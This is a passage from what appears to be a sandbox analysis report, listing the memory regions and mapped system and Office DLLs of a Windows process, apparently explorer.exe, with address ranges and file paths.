= 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009340000" filename = "" Region: id = 896 start_va = 0x9350000 end_va = 0x9508fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 897 start_va = 0x9510000 end_va = 0x9557fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009510000" filename = "" Region: id = 898 start_va = 0x9560000 end_va = 0x975ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009560000" filename = "" Region: id = 899 start_va = 0x9760000 end_va = 0x97dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009760000" filename = "" Region: id = 900 start_va = 0x9860000 end_va = 0x9861fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 901 start_va = 0x9870000 end_va = 0x9870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 902 start_va = 0x98c0000 end_va = 0x98c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098c0000" filename = "" Region: id = 903 start_va = 0x98d0000 end_va = 0x98d3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 904 start_va = 0x98e0000 end_va = 0x98effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098e0000" filename = "" Region: id = 905 start_va = 0x98f0000 end_va = 0x99effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098f0000" filename = "" Region: id = 906 start_va = 0x99f0000 end_va = 0x9b77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 907 start_va = 0x9bf0000 end_va = 0x9bf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009bf0000" filename = "" Region: id = 908 start_va = 0x9c00000 end_va = 0x9c01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009c00000" filename = "" Region: id = 909 start_va = 0x9c10000 end_va = 0x9c11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009c10000" filename = "" Region: id = 910 start_va = 0x9c20000 end_va = 0x9c21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009c20000" filename = "" Region: id = 911 start_va = 0x9c30000 end_va = 0x9c31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009c30000" filename = "" Region: id = 912 start_va = 0x9c40000 end_va = 0x9c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c40000" filename = "" Region: id = 913 start_va = 0x9c50000 end_va = 0x9f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c50000" filename = "" Region: id = 914 start_va = 0xa050000 end_va = 0xa0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a050000" filename = "" Region: id = 915 start_va = 0xa0d0000 end_va = 0xaacffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a0d0000" filename = "" Region: id = 916 start_va = 0xabd0000 end_va = 0xac4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000abd0000" filename = "" Region: id = 917 start_va = 0xac50000 end_va = 0xaccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ac50000" filename = "" Region: id = 918 start_va = 0xaed0000 end_va = 0xaf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aed0000" filename = "" Region: id = 919 start_va = 0xaf50000 end_va = 0xb34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af50000" filename = "" Region: id = 920 start_va = 0xb350000 end_va = 0xb3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b350000" filename = "" Region: id = 921 start_va = 0xb3d0000 end_va = 0xb44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3d0000" filename = "" Region: id = 922 start_va = 0xb450000 end_va = 0xb4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b450000" filename = "" Region: id = 923 start_va = 0xb4d0000 end_va = 0xb5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4d0000" filename = "" Region: id = 924 start_va = 0xb750000 end_va = 0xb751fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b750000" filename = "" Region: id = 925 start_va = 0xb760000 end_va = 0xb761fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b760000" filename = "" Region: id = 926 start_va = 0xbb80000 end_va = 0xbbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bb80000" filename = "" Region: id = 927 start_va = 0xbc00000 end_va = 0xbc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bc00000" filename = "" Region: id = 928 start_va = 0xbc80000 end_va = 0xbcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bc80000" filename = "" Region: id = 929 start_va = 0xbd00000 end_va = 0xbd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd00000" filename = "" Region: id = 930 start_va = 0xbd80000 end_va = 0xbdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd80000" filename = "" Region: id = 931 start_va = 0xbe00000 end_va = 0xbe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000be00000" filename = "" Region: id = 932 start_va = 0xbe80000 end_va = 0xbefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000be80000" filename = "" Region: id = 933 start_va = 0xbf00000 end_va = 0xbf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bf00000" filename = "" Region: id = 934 start_va = 0xc300000 end_va = 0xc37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c300000" filename = "" Region: id = 935 start_va = 0xc380000 end_va = 0xef9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 936 start_va = 0xefa0000 end_va = 0xf491fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000efa0000" filename = "" Region: id = 937 start_va = 0xf9a0000 end_va = 0xfe91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f9a0000" filename = "" Region: id = 938 start_va = 0xfea0000 end_va = 0x10391fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fea0000" filename = "" Region: id = 939 start_va = 0x10680000 end_va = 0x106fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010680000" filename = "" Region: id = 940 start_va = 0x10b00000 end_va = 0x10b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010b00000" filename = "" Region: id = 941 start_va = 0x10b80000 end_va = 0x10bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010b80000" filename = "" Region: id = 942 start_va = 0x10c00000 end_va = 0x10c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c00000" filename = "" Region: id = 943 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 944 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 945 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 946 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 947 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 948 start_va = 0x7ff68aec0000 end_va = 0x7ff68b307fff monitored = 0 entry_point = 0x7ff68af5e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 949 start_va = 0x7ffb43e40000 end_va = 0x7ffb43f93fff monitored = 0 entry_point = 0x7ffb43e47d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoshext.dll") Region: id = 950 start_va = 0x7ffb442c0000 end_va = 0x7ffb4430ffff monitored = 0 entry_point = 0x7ffb442f1220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 951 start_va = 0x7ffb45f90000 end_va = 0x7ffb46c5cfff monitored = 0 entry_point = 0x7ffb460de880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 952 start_va = 0x7ffb47b80000 end_va = 0x7ffb47c2bfff monitored = 0 entry_point = 0x7ffb47b859c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 953 start_va = 0x7ffb48cd0000 end_va = 0x7ffb48d6ffff monitored = 0 entry_point = 0x7ffb48d40910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 954 start_va = 0x7ffb48e20000 end_va = 0x7ffb49165fff monitored = 0 entry_point = 0x7ffb48e28530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 955 start_va = 0x7ffb49170000 end_va = 0x7ffb49192fff monitored = 0 entry_point = 0x7ffb491799a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 956 start_va = 0x7ffb491a0000 end_va = 0x7ffb4935ffff monitored = 0 entry_point = 0x7ffb491a9e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 957 start_va = 0x7ffb49360000 end_va = 0x7ffb495a2fff monitored = 0 entry_point = 0x7ffb493636c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 958 start_va = 0x7ffb495b0000 end_va = 0x7ffb49637fff monitored = 0 entry_point = 0x7ffb495c4510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 959 start_va = 0x7ffb496c0000 end_va = 0x7ffb4970ffff monitored = 0 entry_point = 0x7ffb496cbe50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 960 start_va = 0x7ffb49710000 end_va = 0x7ffb49751fff monitored = 0 entry_point = 0x7ffb49712230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 961 start_va = 0x7ffb49760000 end_va = 0x7ffb497d8fff monitored = 0 entry_point = 0x7ffb497622d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 962 start_va = 0x7ffb497e0000 end_va = 0x7ffb4985afff monitored = 0 entry_point = 0x7ffb497e3af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 963 start_va = 0x7ffb49860000 end_va = 0x7ffb499b9fff monitored = 0 entry_point = 0x7ffb49864610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 964 start_va = 0x7ffb499c0000 end_va = 0x7ffb49bbdfff monitored = 0 entry_point = 0x7ffb499c16c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 965 start_va = 0x7ffb49bc0000 end_va = 0x7ffb49c23fff monitored = 0 entry_point = 0x7ffb49bc6b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 966 start_va = 0x7ffb49c90000 end_va = 0x7ffb49dd0fff monitored = 0 entry_point = 0x7ffb49c95f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 967 start_va = 0x7ffb49de0000 end_va = 0x7ffb49f00fff monitored = 0 entry_point = 0x7ffb49de1cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 968 start_va = 0x7ffb49f10000 end_va = 0x7ffb49f26fff monitored = 0 entry_point = 0x7ffb49f12790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 969 start_va = 0x7ffb49f30000 end_va = 0x7ffb49f3ffff monitored = 0 entry_point = 0x7ffb49f378e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 970 start_va = 0x7ffb4a570000 end_va = 0x7ffb4a5bafff monitored = 0 entry_point = 0x7ffb4a581590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 971 start_va = 0x7ffb4ac00000 end_va = 0x7ffb4ac1efff monitored = 0 entry_point = 0x7ffb4ac037e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 972 start_va = 0x7ffb4ac20000 end_va = 0x7ffb4ac98fff monitored = 0 entry_point = 0x7ffb4ac276a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 973 start_va = 0x7ffb4c140000 end_va = 0x7ffb4c14bfff monitored = 0 entry_point = 0x7ffb4c1435c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 974 start_va = 0x7ffb4c170000 end_va = 0x7ffb4c318fff monitored = 0 entry_point = 0x7ffb4c1c4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 975 start_va = 0x7ffb4d740000 end_va = 0x7ffb4d754fff monitored = 0 entry_point = 0x7ffb4d745740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 976 start_va = 0x7ffb4d7b0000 end_va = 0x7ffb4d7edfff monitored = 0 entry_point = 0x7ffb4d7b9650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 977 start_va = 0x7ffb50000000 end_va = 0x7ffb50279fff monitored = 0 entry_point = 0x7ffb5001a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 978 start_va = 0x7ffb52040000 end_va = 0x7ffb5205afff monitored = 0 entry_point = 0x7ffb5204af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 979 start_va = 0x7ffb52060000 end_va = 0x7ffb520d6fff monitored = 0 entry_point = 0x7ffb52062af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 980 start_va = 0x7ffb520e0000 end_va = 0x7ffb52116fff monitored = 0 entry_point = 0x7ffb520e20a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 981 start_va = 0x7ffb52120000 end_va = 0x7ffb52459fff monitored = 0 entry_point = 0x7ffb52128520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 982 start_va = 0x7ffb52460000 end_va = 0x7ffb524fdfff monitored = 0 entry_point = 0x7ffb524a9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 983 start_va = 0x7ffb52500000 end_va = 0x7ffb52516fff monitored = 0 entry_point = 0x7ffb5250c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 984 start_va = 0x7ffb52520000 end_va = 0x7ffb52733fff monitored = 0 entry_point = 0x7ffb52521000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 985 start_va = 0x7ffb52740000 end_va = 0x7ffb529cdfff monitored = 0 entry_point = 0x7ffb52810f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 986 start_va = 0x7ffb529d0000 end_va = 0x7ffb529d9fff monitored = 0 entry_point = 0x7ffb529d1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 987 start_va = 0x7ffb529e0000 end_va = 0x7ffb52acefff monitored = 0 entry_point = 0x7ffb52a029cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 988 start_va = 0x7ffb52ad0000 end_va = 0x7ffb52b75fff monitored = 0 entry_point = 0x7ffb52b1efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 989 start_va = 0x7ffb52b80000 end_va = 0x7ffb52d0efff monitored = 0 entry_point = 0x7ffb52b901d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 990 start_va = 0x7ffb53260000 end_va = 0x7ffb5329ffff monitored = 0 entry_point = 0x7ffb53276c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 991 start_va = 0x7ffb53310000 end_va = 0x7ffb5331cfff monitored = 0 entry_point = 0x7ffb53311ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 992 start_va = 0x7ffb53320000 end_va = 0x7ffb5337bfff monitored = 0 entry_point = 0x7ffb53337190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 993 start_va = 0x7ffb53380000 end_va = 0x7ffb533ccfff monitored = 0 entry_point = 0x7ffb53397de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 994 start_va = 0x7ffb533d0000 end_va = 0x7ffb53466fff monitored = 0 entry_point = 0x7ffb533dddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 995 start_va = 0x7ffb534d0000 end_va = 0x7ffb534e3fff monitored = 0 entry_point = 0x7ffb534d3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 996 start_va = 0x7ffb53580000 end_va = 0x7ffb5359dfff monitored = 0 entry_point = 0x7ffb5358ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 997 start_va = 0x7ffb535a0000 end_va = 0x7ffb53633fff monitored = 0 entry_point = 0x7ffb535d9210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 998 start_va = 0x7ffb53640000 end_va = 0x7ffb538e2fff monitored = 0 entry_point = 0x7ffb53666190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 999 start_va = 0x7ffb538f0000 end_va = 0x7ffb5396ffff monitored = 0 entry_point = 0x7ffb5391d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1000 start_va = 0x7ffb53970000 end_va = 0x7ffb53991fff monitored = 0 entry_point = 0x7ffb53972580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 1001 start_va = 0x7ffb539a0000 end_va = 0x7ffb539b5fff monitored = 0 entry_point = 0x7ffb539a1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1002 start_va = 0x7ffb539c0000 end_va = 0x7ffb53b77fff monitored = 0 entry_point = 0x7ffb53a2e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1003 start_va = 0x7ffb53b80000 end_va = 0x7ffb53bc7fff monitored = 0 entry_point = 0x7ffb53b8a430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 1004 start_va = 0x7ffb53bd0000 end_va = 0x7ffb53bdbfff monitored = 0 entry_point = 0x7ffb53bd14b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 1005 start_va = 0x7ffb53be0000 end_va = 0x7ffb53bf1fff monitored = 0 entry_point = 0x7ffb53be3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1006 start_va = 0x7ffb53c00000 end_va = 0x7ffb53c09fff monitored = 0 entry_point = 0x7ffb53c014c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1007 start_va = 0x7ffb53c10000 end_va = 0x7ffb53c3afff monitored = 0 entry_point = 0x7ffb53c1c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 1008 start_va = 0x7ffb53c40000 end_va = 0x7ffb53d4cfff monitored = 0 entry_point = 0x7ffb53c6f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 1009 start_va = 0x7ffb53dd0000 end_va = 0x7ffb53e2efff monitored = 0 entry_point = 0x7ffb53dfbce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 1010 start_va = 0x7ffb53ee0000 end_va = 0x7ffb53f05fff monitored = 0 entry_point = 0x7ffb53ee1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1011 start_va = 0x7ffb53f10000 end_va = 0x7ffb53feafff monitored = 0 entry_point = 0x7ffb53f228b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 1012 start_va = 0x7ffb54330000 end_va = 0x7ffb54355fff monitored = 0 entry_point = 0x7ffb54345cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 1013 start_va = 0x7ffb54360000 end_va = 0x7ffb5438afff monitored = 0 entry_point = 0x7ffb54364240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 1014 start_va = 0x7ffb543b0000 end_va = 0x7ffb54435fff monitored = 0 entry_point = 0x7ffb543d1e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 1015 start_va = 0x7ffb54440000 end_va = 0x7ffb54519fff monitored = 0 entry_point = 0x7ffb54473c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 1016 start_va = 0x7ffb54520000 end_va = 0x7ffb5463ffff monitored = 0 entry_point = 0x7ffb54558310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 1017 start_va = 0x7ffb54660000 end_va = 0x7ffb5466bfff monitored = 0 entry_point = 0x7ffb546618b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 1018 start_va = 0x7ffb54670000 end_va = 0x7ffb546bcfff monitored = 0 entry_point = 0x7ffb5467d180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 1019 start_va = 0x7ffb546c0000 end_va = 0x7ffb551cafff monitored = 0 entry_point = 0x7ffb5480a540 region_type = mapped_file name = "twinui.dll" filename = 